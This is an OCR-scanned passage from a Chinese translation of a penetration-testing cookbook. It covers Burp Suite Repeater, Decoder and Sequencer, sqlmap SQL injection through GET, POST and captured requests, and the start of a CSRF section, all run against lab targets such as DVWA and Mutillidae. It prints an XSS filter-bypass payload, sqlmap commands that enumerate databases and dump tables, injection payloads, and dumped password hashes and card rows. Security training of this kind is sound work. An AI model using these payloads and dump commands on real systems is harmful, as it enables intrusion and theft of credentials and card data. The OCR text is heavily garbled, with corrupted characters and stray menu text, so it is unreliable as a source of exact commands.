Do à passive scan 
Send to Intruder 


Send to Sequencer 


在 这 个 例子 中 ， 用 户 生成 的 请 求 用 于 提供 名 称 ， ， 服务 器 以 HTML 响应 返回 所 提供 的 
输入 。 o = oh ep ANY TAERE RA AE RAPA PA AEA AD LAY 
字符 ， 像 这 


Response 


<pre>Hello «('/")»«/pre» 









Hosts 172. 16.36.135 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 
OS X 10.9; rvs#28.0) Gecko/20100101 

Firefox/28.0 

Accept: 
text/html,application/xhtml+xml,application/xml 


</div> 
<h2>More info</h2> 


<ul> 





在 发 送 一 系列 字符 之 后 ， 我 们 可 以 看 到 ， 所 有 字符 都 在 HTML 内 容 中 返回 ， 没 有 字 
符 被 转 义 。 这 很 大 程度 上 表示 ， 这 个 功能 存在 跨 站 脚本 漏洞 。 为 了 测试 漏洞 是 否 可 
以 利用 ， 我 们 可 以 输入 标准 的 标识 请 求 <script>alert('xss')</ script» ， 像 


这 样 : 








Request Response 

finan] Params [ Headers | Hex | | Raw | Headers [ Hex E [ Renger 

GET à 

/dvwa/vulnerabilities/xss r/?nameecacript»alert *pre»Mello alert('xss')«/script»«/pre» 
('xso')«/script» HTTP/1.1 

Host: 172.16.36.135 «/div» 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 
OS X 10.9; rvi28.0) Gecko/20100101 *h2»More info</h2> 

Firefox/28.0 

Accept: <ul> 


通过 查看 返回 的 HTML 内 容 ， 我 们 可 以 看 到 ， 开 头 的 script 标签 已 经 从 响应 中 
移 除 了 。 这 可 能 表明 黑 名 单 禁 和 止 在 输入 中 使 用 Vr 标签 。 黑 名 单 的 问题 就 是 ， 
它 可 以 通过 修改 输入 来 绕 过 。 这 里 ， 我 们 可 以 尝试 通过 修改 标签 中 几 个 字符 的 大 小 
写 来 绕 过 黑 名 单 ， 像 这 

Request 

GET Li 

/dvwa/volnerabilities/xss r/7?nameec«ScRiPt»alert *pre»Mello «ScRiPt»alert('xss')«/script»c/pre» 
('xss')«/script» HTTP/1.1 

Hosts 172.16.36.135 </div> 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 

OS X 10.97 rv:28.0) Gecko/20100101 *h2»More info</h2> 


Firefox/28.0 
Accept: <ul> 


通过 使 用 «ScRiPt» ARE 签 ， 我 们 可 以 看 到 ， 强 加 的 e 闭合 标 
签 都 包含 在 响应 中 。 这 可 以 通过 在 浏览 器 中 输入 请 求 来 验证 ， 像 这 
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GET /dvwa/vulnerabilities/xss r/?name-«ScRiPt»alert('xss')«/script» HTTP/1.1 
Host: 172.16.36.13 
User-Agent: Mozill 
Firefox/28.0 

Accept: text/html, 
Accept-Language: e 
Accept-Encoding: q 
Referer: http://17 
Cookie: security- 
Connection: keep-a 










Send to Spider 
Do an active scan 
Do à passive scan 
Send to Intruder Metal 
Send to Repeater Meta+R 
Send to Sequencer 

Send to Comparer 

Send to Decoder 

Show response in browser 


10.9; rv:28.0) Gecko/20100101 






n/xml;q=0.9,*/*;q=0.8 








/xss_r/ 
8a030f8abe39ea179 
















Engagement tools > 





In current browser session 





Change request method 





为 了 评估 客户 端 浏览 器 中 的 响应 ， ， 右 击 请 求 之 后 选择 Request in browser 。 这 
会 生成 一 个 URL， 它 可 以 用 于 重新 在 已 连接 到 Burp 代理 的 浏览 器 中 提交 请 求 。 





To repeat this request in your browser, copy the URL below and paste 
into a browser that is configured to use Burp as its proxy. 


http:/ /burp/repeat/1 | Copy | 


C In future, just copy the URL and don't show this dialoc | Close | 


我 们 可 以 手动 复制 提供 的 URL， 或 者 点 击 Copy 按钮 。 这 个 URL 之 后 可 以 粘贴 到 
浏览 器 中 ， 而 且 请 求 会 在 浏览 器 中 提交 。 假 设 跨 站 脚本 攻击 是 成 功 的 ， 客 户 端 JS 
代码 会 在 浏览 器 中 泻 染 ， 并 且 屏 幕 上 会 出 现 提 示 框 ， 像 这 样 


e @ 172. 16.36.135/dvwa/vulnerabili Ch Google aj 

















工作 原理 


BurpSuite Repeater 仅仅 通过 向 Web 提供 文本 界面 来 工作 。Repeater 可 以 让 用 户 
通过 直接 操作 请 求 和 远程 Web 服务 交互 ， 而 不 是 和 Web ARS LA REMARK 
实 HTML 输出 比 演 染 在 浏览 器 中 的 方式 更 加 重要 时 非常 有 用 。 


7.12 使 用 BurpSuite Decoder ( #45 & ) 


NAT 


在 处 理 Web 应 用 流量 时 ， 你 会 经 常 看 到 出 于 混 消 或 功能 性 而 编码 的 内 容 。 
BurpSuite Decoder 可 以 解码 请 求 或 响应 中 的 内 容 ， 或 按 需 编码 内 容 。 这 个 秘籍 
中 ， 我 们 会 讨论 如 何 使 用 BurpSuite 编码 和 解码 内 容 。 


准备 


为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 A 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 %0 E » Bet 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


此 外 ， 你 的 Web 浏览 器 需要 配置 iow BurpSuite 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 “配置 BurpSuite” 一 节 。 


TE S 


为 了 向 BurpSuite Decoder 传递 指定 的 值 ， 高 亮 所 需 的 字符 串 ， 右 击 它 ， 并 选 

择 Send to Decoder 。 在 下 面 的 例子 中 ， Cookie 参数 的 值 被 发 送 到 了 解码 器 ， 
像 这 样 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28 


Accept: text/html,application/xhtml+xml,application/xmlj;q=0.9, 
Accept-Language: en-US,enjq*-0.5 


Send to Spider 
Do an active scan 


Accept-Encoding: gzip, deflate Do a passive scan 
Referer: http://172.16.36.135/phpMyAdmin/ Send to Intruder 
Cookie: phpMyAdmin=bal59713aa6d1bd625a3be91001294b7489e5139; Send to Repeater 


pma charset*utf-8; pma theme-original; pma fontsize-824325; 


PHPSESSID=bd3180c67310c158a030f8abe39ea179 Send to Sequencer 


Connection: keep-alive Send to Comparer 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 263 Show response in browser 





过 点 击 Smart decode 442 > BurpSuite 会 自动 将 编码 识别 为 URL 编码 ， 并 将 
其 解码 到 编码 文本 下 面 的 区 域 中 ， 像 这 样 


pma fontsize- 82 Mil @ Text © Hex |?) 
Decode as... vj 
Encode as ... vj 


Hash ass vj 
Smart decode 


pma. fontsize- 82 (9 Text © Hex 


Decode as ... vj 
Encode as ... jv) 


Hash ... 


Smart decode 














如 果 BurpSuite 不 能 判断 编码 类 型 ， 可 以 以 多 种 不 同 编码 类 型 来 手动 解码 ， 包 括 
URL ` HTML ` Base64 ` ASCII Hex， 以 及 其 它 。 解 码 器 也 能 够 使 
用 Encode as... 功能 来 编码 输入 的 字符 串 。 


工作 原理 


BurpSuite Decoder 在 和 Web 应 用 交互 时 提供 了 编码 和 解码 的 平台 。 这 个 工具 十 分 
有 用 因为 Web 上 由 多 种 编码 类 型 经 常用 于 处 理 和 混淆 目 的 。 此 

外 ， Smart decode 工具 检测 任何 所 提供 输入 的 已 知 模式 或 签名 ， 来 判断 内 容 所 
使 用 的 编码 类 型 ， 并 对 其 解码 。 


7.13 使 用 BurpSuite Sequencer (序列 器 ) 


应 用 会 话 通常 由 会 话 ID 标识 来 维护 ， 它 由 随机 或 伪 随 机 值 组 成 。 出 于 这 个 原 
因 ， 随 机 性 通常 是 这 些 应 用 的 安全 的 关键 。 这 个 秘籍 中 ， 我 们 会 讨论 如 何 使 用 
BurpSuite Sequencer 来 收集 生成 的 值 ， 并 测试 它们 的 随机 性 。 


准备 


为 了 使 用 BurpSuite 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 安装 装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 上 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


此 外 ， 你 的 Web 浏览 器 需要 配置 n Tuo 本 地 实例 代理 Web 流量 。 关 于 
将 BurpSuite 用 作 浏 览 器 代理 的 更 多 信息 ， 请 参考 第 一 章 的 “配置 BurpSuite” 一 节 。 


操作 步骤 


为 了 使 用 BurpSuite Sequencer， 响 应 必须 包含 Set-Cookie 协议 头 ， 或 者 其 它 伪 
随机 数 的 值 ， 测 试 需要 它们 来 发 送 。 这 可 以 通过 HTTP 代理 历史 或 者 先 于 浏览 器 的 
响应 拦截 来 完成 ， 像 这 样 

HTTP/1.1 200 OK 


Date: Sun, 13 Apr 2014 04:07:47 GMT 
Server: Apache/2.2.8 (Ubuntu) DAV/2 











Send to Spider 
X-Powered-By: PHP/5.2.4-2ubuntu5.10 
Expires: Thu, 19 Nov 1981 08:52:00 GMT DOAN SONE SAN 
Logged-In-User: Do a passive scan 
Cache-Control: public Send to Intruder Metal 
Pragma: public SM 1o epi Meta+R 
Set-Cookie: PHPSESSID=bd3180c67310c158a030f8abe39eal79; yp 95 yep 
Last-Modified: Sun, 13 Apr 2014 04:07:47 GMT 
Keep-Alive: timeout=15, max=100 Send to Comparer 
Connection: Keep-Alive Send to Decoder 
Content-Type: text/html Show response in browser 


Burp 会 自动 使 用 响应 中 的 所 有 Cookie 483% % Cookie 下 拉 菜 单 。 作 为 替代 ， 你 可 
以 使 用 Custom 字段 ， 之 后 点 击 Configure 按钮 来 指定 响应 | 
位 置 用 于 测试 ， 像 这 


Token Location Within Response 


Select the location in the response where the token appears. 


© Cookie PHPSESSID=bd3 180c67310c158a030 ... 7 
© Custom location | Configure J 
在 确定 需要 测试 的 值 之 后 ， 点 击 start live capture 按钮 ， 这 会 开始 提交 大 量 


请 求 来 区 了 得 参数 的 附加 值 。 这 个 例子 中 ，Burp 会 会 提交 大 量 请 求 ， 并 将 PHPSESSID 
从 请 求 中 去 除 。 这 会 导致 服务 器 Dl uot 
可 以 获得 样本 值 ， 它 们 可 以 用 于 完成 FIPS 测试 。FIPS 测试 由 一 系列 测试 组 成 ， 它 
oe 。 所 有 这 些 测试 会 以 图 形 格式 展示 ， 使 其 十 分 易 
"TP 





>0.01% 


»0.001*5 


0 10 20 30 40 50 60 70 80 90 100 110 120 


Number of bits of entropy 


对 于 高 准确 率 和 彻底 的 FIPS 测试 来 说 ， 总 共 需 要 20000 个 值 。 但 是 分 析 最 少 可 以 
以 100 个 值 来 执行 。 除 了 执行 实时 捕获 之 外 ， Manual load 标签 页 可 以 用 于 为 测 
试 上 传 或 粘贴 值 的 列表 。 


工作 原理 


BurpSuite Sequencer 对 伪 随 机 数 样本 执行 大 量 不 同 的 数学 评估 ， 根 据 所 生成 随机 
数 的 炉 尝试 判断 其 质量 。 实 时 捕获 可 用 于 生成 样本 值 ， 它 通过 提交 事先 构造 的 请 
求 ， 并 导致 服务 器 指派 新 的 值 。 这 通常 通过 从 请 求 中 移 除 现 有 Cookie 值 ， 从 而 使 
响应 以 新 的 Set-Cookie 协议 头 的 形式 ， 提 供 新 的 会 话 标识 来 完成 。 


7.14 使 用 sqlmap 注入 GET 方法 


Web 应 用 常常 接受 所 提供 URL 内 的 参数 。 这 些 参数 通常 以 HTTP GET 方法 传 给 
务 器 。 如 果 任 何 这 些 参数 随后 包含 在 发 给 后 端 数据 库 的 查询 语 负 中 ，SQL s 
就 可 能 存在 。 我 们 会 讨论 如 何 使 用 sqlmap 来 自动 化 HTTP GET 方法 请 求 参数 的 测 
试 。 


准备 


为 了 使 用 sglmap 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 应 
用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 TR 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端 E 配置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 


操作 步骤 


为 了 使 用 sglmap 来 测试 HTTP GET 方法 参数 ， 你 需要 使 用 -u 参数 以 及 要 测试 的 
URL。 这 个 URL 应 该 包含 任何 GET 方法 参数 。 此 外 ， 如 果 Web 内 容 仅 仅 通过 建 
立 的 会 话 来 方法 ， 还 需要 使 用 --cookie 提供 与 会 话 对 应 的 Cookie 。 


root@KaliLinux:~# sqlmap -u "http://172.16.36.135/dvwa/vulnerabi 
lities/ sqli/?id=x&Submit=y" --cookie="Security=low; PHPSESSID-b 
cd9bf2b6171b16f94 3cd20c1651bf8f" --risk=3 --level=5 
炎炎 {CUT} ** 

sqlmap identified the following injection points with a total of 
279 HTTP(S) requests: 
Place: GET 
Parameter: id 

Type: boolean-based blind 

Title: OR boolean-based blind - WHERE or HAVING clause 

Payload: id=-2345' OR (1644-1644) AND 'moHu'='moHu&Submit=y 


Type: error-based 
Title: MySQL »- 5.0 AND error-based - WHERE or HAVING clause 


Payload: id-x' AND (SELECT 1537 FROM(SELECT COUNT( *), CONCAT( 
Ox3a6b6f 683a, (SELECT (CASE WHEN (1537-1537) THEN 1 ELSE © END)) 
, 0x3a696a793a, FLO OR(RAND(0)*2))x FROM INFORMATION SCHEMA.CHARAC 
TER SETS GROUP BY x)a) AND 'VHVT'-'VHVT&Submit-y 


Type: UNION query 

Title: MySQL UNION query (NULL) - 2 columns 

Payload: id-x' UNION ALL SELECT CONCAT(0x3a6b6f683a, 0x797963 
4f4e716b7 55961,0x3a696a793a), NULL#&Submit=y 


Type: AND/OR time-based blind 

Title: MySQL « 5.0.12 AND time-based blind (heavy query) 

Payload: id-x' AND 5276-BENCHMARK(5000000,MD5(0x704b5772)) A 
ND 'XiQP'='XiQP&Submit=y 


** {TRUNCATED} ** 


上 面 的 例子 使 用 了 risk 42 3 和 level 4& 5 。 这 些 值 定义 了 所 执行 测试 的 风险 
性 和 彻底 性 。 更 多 risk 和 level 的 信息 请 参考 sqlmap 手册 页 和 帮助 文件 。 执 
行 测试 时 ，sqlmap 会 快速 将 后 端 数据 库 识 别 为 MySQL， 并 跳 过 其 它 测试 。 如 果 没 
有 指定 任何 操作 ，sqlmap 会 仅仅 判断 是 否 任何 参数 存在 漏洞 ， 像 上 个 例子 那样 。 
在 一 系列 注入 尝试 之 后 ，sqlmap 判断 出 ID 参数 存在 多 种 类 型 的 SQL 注入 漏洞 。 
在 确认 漏洞 之 后 ，sqlmap 会 执行 操作 来 提取 后 端 数据 库 的 信息 。 


root@KaliLinux:~# sqlmap -u "http://172.16.36.135/dvwa/vulnerabi 
lities/ sqli/?id=x&Submit=y" --cookie="Security=low; PHPSESSID-b 
cd9bf2b6171bi16f94 3cd20ci1651bf8f" --risk=3 --level-5 --dbs 

kok {CUT} ** 


[03:38:00] [INFO] the back-end DBMS is MySQL 

web server operating system: Linux Ubuntu 8.04 (Hardy Heron) 

web application technology: PHP 5.2.4, Apache 2.2.8 

back-end DBMS: MySQL 5.0 

[03:38:00] [INFO] fetching database names 

[03:38:00] [WARNING] reflective value(s) found and filtering out 


available databases [7]: 
[*] dvwa 
[*] information schema 
[*] metasploit 
[^] mysql 
[*] owasp10 
[*] tikiwiki 
[*] tikiwiki195 
** {TRUNCATED} ** 


在 上 面 的 例子 中 ， --dbs 参数 用 于 枚 举 所 有 可 用 的 ， 能 通过 SQL 注入 访问 的 数据 
。 通 过 名 称 来 判断 ， 它 表明 列 出 的 数据 库 直 接 对 应 DVWA 的 应 用 。 我 们 之 后 可 

直接 对 数据 库 执行 操作 。 为 了 提取 DWVA 数据 库 的 所 有 表 的 名 称 ， 我 们 可 以 使 
7 --tables 参数 来 让 sglmap 提取 表 名 称 ， 之 后 使 用 -D 参数 指定 需要 提取 的 数 
据 库 ( dvwa ) ° 


root@KaliLinux:~# sqlmap -u "http://172.16.36.135/dvwa/vulnerabi 
lities/ sqli/?id=x&Submit=y" --cookie="Security=low; PHPSESSID-b 
cd9bf2b6171bi16f94 3cd20ci1651bf8f" --risk=3 --level-5 --tables -D 
dvwa 

** {CUT} ** 
Database: dvwa 
[2 tables] 


1 guestbook | 
| users | 


** (TRUNCATED) ** 


这 样 做 ， 我 们 可 以 看 到 DVWA 数据 库 中 有 两 个 表 。 这 些 表 包 

括 guestbook 和 users 。 用 户 表 通常 值得 提取 ， 因 为 它 通常 包含 用 户 名 和 相关 
的 密码 哈 希 。 为 了 从 某 个 指定 表 中 提取 信息 ， > 我 们 可 以 使 用 --dump 参数 ， 之 后 使 
用 -D 参数 来 指定 数据 库 ， -T 参数 来 指定 提取 哪个 表 的 内 容 。 


root@KaliLinux:~# sqlmap -u "http://172.16.36.135/dvwa/vulnerabi 
lities/ sqli/?id=x&Submit=y" --cookie-'security-low; PHPSESSID-b 
cd9bf2b6171bi16f94 3cd20ci1651bf8f" --risk=3 --level=5 --dump -D d 
vwa -T users 

** {CUT} ** 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
Y 
[03:44:03] [INFO] using hash method 'md5_generic_passwd' 
what dictionary do you want to use? 
[1] default dictionary file './txt/wordlist.zip' (press Enter) 
[2] custom dictionary file 
[3] file with list of dictionary files 
> 
[03:44:08] [INFO] using default dictionary 
do you want to use common password suffixes? (slow!) [y/N] N 


** {CUT} * x 
Database: dvwa 
Table: users 
[5 entries] 
ee ipee RRS SS SSeS ea eee ee ae Se 
M eer 下 
"een ecc eee. 
| user id | user | avatar 
| password | las 

t name | first name | 
fas asses aS aga 下 
A eT SEAT qe c————————— ce eee erede 
cce p E 
feet | admin | http://192.168.223.132/dvwa/hackable/users 
/admin. jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | ad 
min | admin | 
| 52 | gordonb | http://192.168.223.132/dvwa/hackable/users 
/gordonb. jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Br 
own | Gordon | 
| 3 | 1337 | http://192.168.223.132/dvwa/hackable/users 
/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me 

| Hack | 
| 4 | pablo | http://192.168.223.132/dvwa/hackable/users 
/pablo. jpg | 0d107dO09f5bbe40cade3de5c71e9e9b7 (letmein) | Pi 
casso | Pablo | 
[zb | smithy | http://192.168.223.132/dvwa/hackable/users 


/smithy. jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Sm 
ith | Bob | 


** {TRUNCATED} ** 


在 识别 表 的 内 容 中 存在 密码 哈 希 之 后 ，sqlmap 会 提供 选项 ， 询 问 用 户 是 否 使 用 内 
置 的 密码 破解 器 来 对 枚 举 密码 哈 希 执行 字典 攻击 。 这 可 以 使 用 内 置 单词 列表 ， 自 定 
义 单词 列表 ， 或 者 一 系列 单词 列表 来 执行 。 在 执行 字典 攻击 之 后 ， 我 们 可 以 看 到 表 


的 内 容 包 含 用 户 ID， 用 户头 像 的 位 置 ，MD5 哈 希 ， 哈 希 的 纯 文本 附加 和 值 (2b) > 
以 及 用 户 姓 名 。 


工作 原理 


sqlmap 的 原理 是 提交 来 自 大 量 已 知 SQL 注入 查询 列表 的 请 求 。 它 在 近 几 年 间 已 经 
高 度 优 化 ， 并 给 了 予 之 前 查询 的 响应 来 智能 调整 注入 。 在 HTTP GET 参数 上 执行 
SQL 2A 3b RBH > AABGARA RELA AR URL © 


7.15 使 用 sqlmap 注入 POST 方法 


sqlmap X Kali 中 的 集成 命令 令 行 工具 ， 它 通过 
用 SQL 注入 漏洞 所 需 的 经 历 总 量 。 这 个 秘籍 
动 化 HTTP POST 请 求 参 数 的 测试 。 


准备 
为 了 使 用 sqlmap 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 应 
用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 


Metasploitable2 拥有 多 种 预 安装 装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 3 Sed 配置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 


为 了 在 使 用 HTTP POST 方法 的 服务 上 指定 SQL 注入 ， 我 们 需要 使 用 --data 参 
数 来 指定 POST 参数 字符 串 。Mutilidae 的 登录 应 用 提供 了 一 个 登录 页 面 ， 它 通过 
POST 方法 传递 用 户 名 和 密码 。 它 就 是 我 们 的 SQL 注入 攻击 目标 。 看 看 下 面 的 例 
Fr 


动 化 整个 流程 ， 极 大 降低 了 手动 利 


自 
中 ， 我 们 会 讨论 如 何 使 用 sglmap 来 自 


root@KaliLinux:~# sqlmap -u "http://172.16.36.135/mutillidae/ind 


ex. php?page-login.php" --data="username=user&password=pass&logi 
n-php-submitbutton=Login" --level-5 --risk=3 
类 类 {CUT} 类 类 


sqlmap identified the following injection points with a total of 
267 HTTP(S) requests: 
Place: POST 
Parameter: username 

Type: boolean-based blind 

Title: OR boolean-based blind - WHERE or HAVING clause (MySQ 
L comment ) 

Payload: username--8082' OR (4556=4556 )#&password=pass&login 
-phpsubmit -button=Login 


Type: error-based 
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause 


Payload: username-user' AND (SELECT 3261 FROM(SELECT COUNT (* 
), CONCAT( 0x3a61746d3a, (SELECT (CASE WHEN (3261-3261) THEN 1 ELS 
E © END) ),90x3a76676 23a, FLOOR(RAND(@)*2))x FROM INFORMATION SCHE 
MA.CHARACTER_SETS GROUP BY x) a) AND 'MraR'='MraR&password=pass& 
login-php-submit -button=Login 
[04:14:10] [INFO] the back-end DBMS is MySQL 
web server operating system: Linux Ubuntu 8.04 (Hardy Heron) 
web application technology: PHP 5.2.4, Apache 2.2.8 
back-end DBMS: MySQL 5.0 

** {TRUNCATED} ** 


如 果 没 有 指定 操作 ，sqlmap 仅仅 会 判断 是 否 任何 参数 存在 漏洞 ， 像 上 面 的 例子 那 
样 。 在 一 系列 注入 尝试 之 后 ，sqlmap 判断 出 用 户 名 POST 参数 存 

在 boolean-blind 和 error-based 漏洞 。 在 确认 漏洞 之 后 ，sqlmap 会 执行 操 
作 ， 开 始 从 后 端 数据 库 提 取信 息 。 


root@KaliLinux:~# sqlmap -u "http://172.16.36.135/mutillidae/ind 


ex. php?page-login.php" --data="username=user&password=pass&logi 
n-php-submitbutton-Login" --dbs 
** (CUT) 类 类 


available databases [7]: 
[*] dvwa 
[*] information schema 
[*] metasploit 
[^] mysql 
[*] owasp10 
[*] tikiwiki 
[*] tikiwikii195 
** {TRUNCATED} ** 


在 上 面 的 例子 中 ， --dbs 参数 用 于 枚 举 所 有 可 用 的 ， 可 通过 SQL 注入 访问 的 数据 
库 。 我 们 随后 可 以 对 特定 数据 库 直 接 执行 操作 。 为 了 提取 owasp10 数据 库 中 的 所 
有 表 的 名 称 ， 我 们 可 以 使 用 --tables 参数 让 sqlmap 提取 表 名 称 。 之 后 使 

用 -D 参数 来 指定 从 哪个 数据 库 ( owaspi0 ) 提取 名 称 。 


root@KaliLinux:~# sqlmap -u "http://172.16.36.135/mutillidae/ind 


ex. php?page-login.php" --data="username=user&password=pass&logi 
n-php-submitbutton-Login" --tables -D owasp10 
** {CUT} ** 
Database: owasp10 
[6 tables] 
Tessas ao e Lp oS + 
accounts 


blogs table 
captured data 
credit cards 
hitlog 

pen test tools 


** (TRUNCATED) ** 


这 样 做 ， 我 们 就 可 以 看 到 ， owasp16 数据 库 中 存在 六 个 表 。 这 些 表 包 

& accounts, blog table, captured data, credit cards, hitlog, and per 
» d 8] RAR 5f credit cards 。 为 了 提取 某 个 指定 表 的 内 容 ， 我 们 可 以 使 
用 --dump 参数 ， 之 后 使 用 -D 参数 来 指定 数据 库 ， -T 参数 来 指定 从 哪个 表 中 
提取 内 容 。 


root@KaliLinux:~# sqlmap -u "http://172.16.36.135/mutillidae/ind 


ex. php?page-login.php" --data="username=user&password=pass&logi 
n-php-submitbutton-Login" --dump -D owaspi10 -T credit cards 
大 类 {CUT} ** 


Database: owaspi10 
Table: credit cards 
[5 entries] 


$------ +----- foe een e eee eee eeee- $------------ + 
| ccid | ccv | ccnumber | expiration | +------ tooo + == 
ween nee SaS oa i 

| 1 | 745 | 4444111122223333 | 2012-03-01 | 

[52 | 722 | 7746536337776330 | 2015-04-01 | 

| 3 | 461 | 8242325748474749 | 2016-03-01 | 

| 4 | 230 | 7725653200487633 | 2017-06-01 | 

| 5 | 627 | 1234567812345678 | 2018-11-01 | +------ pe EU 
T2---11121l1------. T----222.----- 


** (TRUNCATED) ** 


工作 原理 


sqlmap 的 原理 是 提交 交 来 自 大 量 已 知 SQL 求 。 它 在 近 几 年 间 已 经 
高 度 优化 ， 并 给 予 之 前 查询 的 响应 来 智能 调整 注入 。 在 HTTP POST 参数 上 执行 
SQL 注入 的 原理 是 操作 添加 到 POST Pt RRO 数据 。 


7.16 使 用 sqlmap 注入 捕获 的 请 求 


为 了 简化 sqlmap 的 使 用 流程 ， 可 以 使 用 来 自 BurpSuite 的 捕获 请 求 并 使 用 定义 在 
其 中 的 所 有 参数 和 配置 来 执行 sqlImap。 在 这 个 秘 头 中 ， 我 们 会 讨论 如 何 使 用 
sqlmap 来 测试 和 所 捕获 请 求 相关 的 参数 。 


准备 


为 了 使 用 sqimap 对 目标 执行 Web 应 用 分 析 ， 你 需要 拥有 运行 一 个 或 多 个 Web 应 
用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 TRE 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 3 v E » ME 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


操作 步骤 


为 了 在 sqimap 中 使 用 捕获 的 请 求 ， 必 须 首 先 将 其 保存 为 文本 格式 。 为 了 这 样 做 ， 
右 击 中 的 请 求 内 容 之 后 选择 Copy to file 。 保 存 之 后 ， 你 就 可 以 通 
过 浏览 器 目录 并 使 用 cat 命令 来 验证 文件 内 容 。 


root@KaliLinux:~# cat dvwa capture 

GET /dvwa/vulnerabilities/sqli blind/?id-test here&Submit-Submit 
HTTP/1.1 

Host: 172.16.36.135 

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/2010010 

1 Firefox/18.0 Iceweasel/18.0.1 

Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/ 
*;q-0.8 

Accept-Language: en-US,en;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://172.16.36.135/dvwa/vulnerabilities/sqli blind/ 

Cookie: security-low; PHPSESSID-8aa4a24cd6087911eca39c1cb95a7b0c 


Connection: keep-alive 
为 了 使 用 捕获 的 请 求 ， 以 -r 参数 执行 sqlmap， 值 为 文件 的 绝对 路 径 。 这 个 方式 


常会 极 大 降低 在 sqlmap 命令 中 需要 提供 的 信息 量 ， 因 为 需要 提供 的 多 数 信息 都 
包含 在 文件 里 了 。 看 看 下 面 的 例子 : 


oot@KaliLinux:~# sqlmap -r /root/dvwa capture --level=5 --risk-3 
-p id 

[*] starting at 16:44:09 

[16:44:09] [INFO] parsing HTTP request from '/root/dvwa capture' 


在 上 面 的 例子 中 ， 不 需要 向 sqlmap 传递 任何 Cookie 44 * AA Cookie 值 已 经 定义 
在 捕获 的 请 求 中 了 。 当 sglmap 运行 时 ， 捕 获 文件 中 的 Cookie 会 自动 在 所 有 请 求 
中 使 用 ， 像 这 样 : 


GET parameter 'id' is vulnerable. Do you want to keep testing th 
e others (if any)? [y/N] N 
sqlmap identified the following injection points with a total of 
487 HTTP(s) requests: 
Place: GET 
Parameter: id 
Type: boolean-based blind 
Title: OR boolean-based blind - WHERE or HAVING clause 
Payload: id--8210' OR (7740-7740) AND 'ZUCk'-'ZUCk&Submit-Su 
bmit 


Type: UNION query 

Title: MySQL UNION query (NULL) - 2 columns 

Payload: id-test here' UNION ALL SELECT NULL, CONCAT(0x3a6f 63 
723a,0x67 744€67787a6157674e, 0x3a756c753a)#&Submit=Submit 


Type: AND/OR time-based blind 

Title: MySQL < 5.0.12 AND time-based blind (heavy query) 

Payload: id=test_here' AND 4329=BENCHMARK( 5000000, MD5(0x486a 
7a4a)) AND 'ARpD'='ARpD&Submit=Submit 


sqlmap 能 够 测试 捕获 请 求 中 的 所 有 识别 的 GET 方法 参数 。 这 里 ， 我 们 可 以 看 
到 ， ID 参数 存在 多 个 SQL 注入 漏洞 。 


工作 原理 


sqlmap 能 够 接受 捕获 的 请 求 ， 来 解析 请 求 的 内 容 并 是 被 任何 可 测试 的 参数 。 这 让 
sqlmap 能 够 高 效 执行 ， 而 不 需要 花费 额外 的 经 历来 传递 攻击 所 需 的 所 有 参数 。 


7.17 自动 化 CSRF 测试 


跨 站 请 求 伪 造 (CSRF) 是 最 难以 理解 的 Web 应 用 漏洞 之 一 。 无 论 如 何 ， 不 能 够 识 
别 这 类 漏洞 会 危害 Web 应 用 和 它 的 用 户 。 这 个 秘籍 中 ， 我 们 会 讨论 如 何 测试 GET 
fe POST 方法 中 的 CSRF 漏洞 。 


AE 

为 了 对 目标 执行 CSRF 测试 ， 你 需要 拥有 运行 一 个 或 多 个 含有 CSRF 漏洞 的 Web 
应 用 的 远程 系统 。 所 提供 的 例子 中 ， 我 们 使 用 Metasploitable2 实例 来 完成 任务 。 
Metasploitable2 拥有 多 种 预 安装 的 漏洞 Web 应 用 ， 运 行 在 TCP 80 端口 上 。 配 置 
Metasploitable2 的 更 多 信息 请 参考 第 一 章 中 的 “安装 Metasploitable2" $548 » 


操作 步骤 


